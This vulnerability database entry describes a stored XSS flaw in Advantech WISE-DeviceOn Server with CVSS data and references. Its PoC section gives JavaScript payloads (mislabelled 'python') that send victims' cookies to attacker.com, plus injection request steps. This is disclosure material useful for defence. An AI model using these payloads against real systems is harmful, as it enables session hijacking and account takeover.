CVE-2025-34266

Description

Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/addins/menus endpoint. When an authenticated user adds or edits an AddIns menu entry, the label and path values are stored in plugin configuration data and later rendered in the AddIns UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected AddIns entry, potentially enabling session compromise and unauthorized actions as the victim.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:* - VULNERABLE

Advantech WISE-DeviceOn Server < 5.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-34266 PoC - Stored XSS in Advantech WISE-DeviceOn Server
// Target: /rmm/v1/plugin-config/addins/menus endpoint
// Payload injection via label or path parameter

const payload = '<script>document.location="https://attacker.com/steal?c='+document.cookie+'"</script>';

// Alternative payload using event handler (bypasses some filters)
const altPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">';

// Step 1: Authenticate and obtain session token
const loginReq = {
  method: 'POST',
  url: '/api/auth/login',
  body: JSON.stringify({
    username: 'low_privilege_user',
    password: 'password'
  })
};

// Step 2: Add malicious AddIns menu entry
const addMenuReq = {
  method: 'POST',
  url: '/rmm/v1/plugin-config/addins/menus',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <session_token>'
  },
  body: JSON.stringify({
    label: payload,
    path: '/malicious/plugin',
    enabled: true
  })
};

// Step 3: When other users view AddIns UI, XSS executes in their browser context

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34266
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34266
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34266/
[4] VulDB https://vuldb.com/cve/CVE-2025-34266
[5] https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf
[6] https://docs.deviceon.advantech.com/docs/resource/
[7] https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-addins-menus

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34266", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:56.580", "lastModified": "2025-12-17T17:15:50.013", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/addins/menus endpoint. When an authenticated user adds or edits an AddIns menu entry, the label and path values are stored in plugin configuration data and later rendered in the AddIns UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected AddIns entry, potentially enabling session compromise and unauthorized actions as the victim."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:wise-deviceon_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4", "matchCriteriaId": "BFB1F2C4-C260-473E-A6E1-EE7DFC3EF083"}]}]}], "references": [{"url": "https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf", "source": "[email protected]"}, {"url": "https://docs.deviceon.advantech.com/docs/resource/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-addins-menus", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}